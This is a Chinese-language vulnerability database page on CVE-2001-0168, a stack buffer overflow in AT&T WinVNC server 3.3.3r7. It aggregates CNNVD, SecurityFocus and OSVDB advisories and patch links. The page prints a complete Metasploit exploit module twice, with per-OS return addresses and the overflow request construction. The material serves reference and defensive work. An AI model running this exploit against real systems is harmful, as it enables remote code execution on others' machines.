CVE-2001-0168
CVSS10.0
发布时间 :2001-05-03 00:00:00
修订时间 :2016-10-17 22:10:06
NMCOEPS    

[原文]Buffer overflow in AT&T WinVNC (Virtual Network Computing) server 3.3.3r7 and earlier allows remote attackers to execute arbitrary commands via a long HTTP GET request when the DebugLevel registry key is greater than 0.


[CNNVD]AT&T WinVNC 服务器程序缓冲区溢出漏洞(CNNVD-200105-064)

        CVE(CAN) ID: CAN-2001-0168
        
        
        
        WinVNC 是可免费获得的远程管理软件包,设计用来访问
        
        远程系统,它由 AT&T 发行和维护。
        
        
        
        该软件包的服务器部分存有问题,这使得远程用户可以执
        
        行任意代码。问题来源于设置非零调试级别时对 HTTP 请
        
        求的处理。HTTP 请求放在一个长 1024 字节的缓冲区中。
        
        当 Windows 注册钥调试级别的值被设置成大于零时,用
        
        ReallyPrint() 函数把 HTTP 请求写入日志。ReallyPrint()
        
        函数中有一个固定大小的长 1024 字节的缓冲区。有可能
        
        构造一个精巧的 HTTP 请求发给 WinVNC 服务器,用以覆
        
        盖堆栈变量,包括返回地址。
        
        
        
        恶意用户可以利用这个漏洞以 WinVNC 服务进程的权限执
        
        行任意代码,进而访问远程系统。
        
        
        
        
        
        <* 来源:Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>
        
        
        
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0168
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0168
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-064
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=vnc-list&m=98080763005455&w=2
(UNKNOWN)  BUGTRAQ  20010129 [CORE SDI ADVISORY] WinVNC server buffer overflow
http://www.kb.cert.org/vuls/id/598581
(UNKNOWN)  CERT-VN  VU#598581
http://www.securityfocus.com/bid/2306
(VENDOR_ADVISORY)  BID  2306
http://xforce.iss.net/static/6026.php
(VENDOR_ADVISORY)  XF  winvnc-server-bo(6026)

- 漏洞信息

AT&T WinVNC 服务器程序缓冲区溢出漏洞
危急 边界条件错误
2001-05-03 00:00:00 2006-04-07 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-0168
        
        
        
        WinVNC 是可免费获得的远程管理软件包,设计用来访问
        
        远程系统,它由 AT&T 发行和维护。
        
        
        
        该软件包的服务器部分存有问题,这使得远程用户可以执
        
        行任意代码。问题来源于设置非零调试级别时对 HTTP 请
        
        求的处理。HTTP 请求放在一个长 1024 字节的缓冲区中。
        
        当 Windows 注册钥调试级别的值被设置成大于零时,用
        
        ReallyPrint() 函数把 HTTP 请求写入日志。ReallyPrint()
        
        函数中有一个固定大小的长 1024 字节的缓冲区。有可能
        
        构造一个精巧的 HTTP 请求发给 WinVNC 服务器,用以覆
        
        盖堆栈变量,包括返回地址。
        
        
        
        恶意用户可以利用这个漏洞以 WinVNC 服务进程的权限执
        
        行任意代码,进而访问远程系统。
        
        
        
        
        
        <* 来源:Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
         CNNVD建议您立即下载补丁程序打上补丁:
        
        
        
         ftp://ftp.core-sdi.com/pub/patches/VNC-serverBO.patch

- 漏洞信息 (16491)

WinVNC Web Server <= v3.3.3r7 GET Overflow (EDBID:16491)
windows remote
2009-12-06 Verified
0 metasploit
N/A [点击下载]
##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'WinVNC Web Server <= v3.3.3r7 GET Overflow',
			'Description'	=> %q{
				This module exploits a buffer overflow in the AT&T WinVNC version
				<= v3.3.3r7 web server. When debugging mode with logging is
				enabled (non-default), an overly long GET request can overwrite
				the stack. This exploit does not work well with VNC payloads!
			},
			'Author' 	=> 'patrick',
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 7724 $',
			'References'    =>
			[
				[ 'BID', '2306' ],
				[ 'OSVDB', '6280' ],
				[ 'CVE', '2001-0168' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 979,
					'BadChars' 		=> "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				[ 'Windows NT4 SP3-6', 	{ 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll
				[ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll
				[ 'Windows XP SP0-1', 	{ 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll
			],
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget' => 1))

			register_options(
			[
				Opt::RPORT(5800),
			],self.class)
	end

	def exploit

		sploit = '/' + payload.encoded + [target['Ret']].pack('V')
		sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

		res = send_request_raw({
			'uri'          => sploit,
			'method'       => 'GET',
		}, 5)

		handler

	end

end
		

- 漏洞信息 (F83084)

WinVNC Web Server <= v3.3.3r7 GET Overflow (PacketStormID:F83084)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,web,overflow
CVE-2001-0168
[点击下载]

This Metasploit module exploits a buffer overflow in the AT&T WinVNC version <= v3.3.3r7 web server. When debugging mode with logging is enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads!

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'WinVNC Web Server <= v3.3.3r7 GET Overflow',
			'Description'	=> %q{
				This module exploits a buffer overflow in the AT&T WinVNC version
				<= v3.3.3r7 web server. When debugging mode with logging is
				enabled (non-default), an overly long GET request can overwrite
				the stack. This exploit does not work well with VNC payloads!
			},
			'Author' 	=> 'patrick',
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'BID', '2306' ],
				[ 'OSVDB', '6280' ],
				[ 'CVE', '2001-0168' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 979,
					'BadChars' 		=> "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				[ 'Windows NT4 SP3-6', 	{ 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll
				[ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll
				[ 'Windows XP SP0-1', 	{ 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll
			],
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget' => 1))

			register_options(
			[
				Opt::RPORT(5800),
			],self.class)
	end

	def exploit

		sploit = '/' + payload.encoded + [target['Ret']].pack('V')
		sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

		res = send_request_raw({
			'uri'          => sploit,
			'method'       => 'GET',
		}, 5)

		handler

	end

end    

- 漏洞信息

6280
AT&T WinVNC Server HTTP GET Overflow
Remote / Network Access, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability Third-Party Solution
Exploit Public

- 漏洞描述

A remote overflow exists in AT&T WinVNC server. The HTTP component fails to use bounds resulting in a stack overflow. With a specially crafted request, an attacker can execute code remotely resulting in a loss of confidentiality, integrity and availability.

- 时间线

2001-01-29 Unknow
Unknow Unknow

- 解决方案

Products

AT&amp;amp;amp;T

WinVNC

v3.3.3r7

- 相关参考

- 漏洞作者

- 漏洞信息

AT&T WinVNC Server Buffer Overflow Vulnerability
Boundary Condition Error 2306
Yes No
2001-01-29 12:00:00 2009-07-11 04:46:00
This vulnerability was discovered by Emiliano Kargieman, Agustin Azubel, and Maximiliano Caceres of Core SDI, and announced to Bugtraq via a Core SDI Advisory on January 29, 2001.

- 受影响的程序版本

AT&T WinVNC Server 3.3.3 r7
- Microsoft Windows 2000 Professional
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- 漏洞讨论

WinVNC is a freely available software package designed to give remote desktop access to servers using the client/server. It is distributed and maintained by AT&amp;T.

A problem with the WinVNC server could allow remote users to arbitrarily execute code. The problem is due to the handling of HTTP requests when a non-zero debug level has been set. HTTP requests are placed into a buffer of 1024 bytes, and when the Windows registry key DebugLevel is set to a value greater than 0, the HTTP request is logged using the method ReallyPrint(), which contains a fixed buffer of 1024 bytes. It is possible to generate a custom crafted HTTP request to the WinVNC server that will overwrite variables on the stack, including the return address.

A malicious user can use this vulnerability to execute arbitrary code with privileges of the WinVNC server process, and potentially gain access to the local system.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The following patch was provided by Core SDI:


AT&T WinVNC Server 3.3.3 r7

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站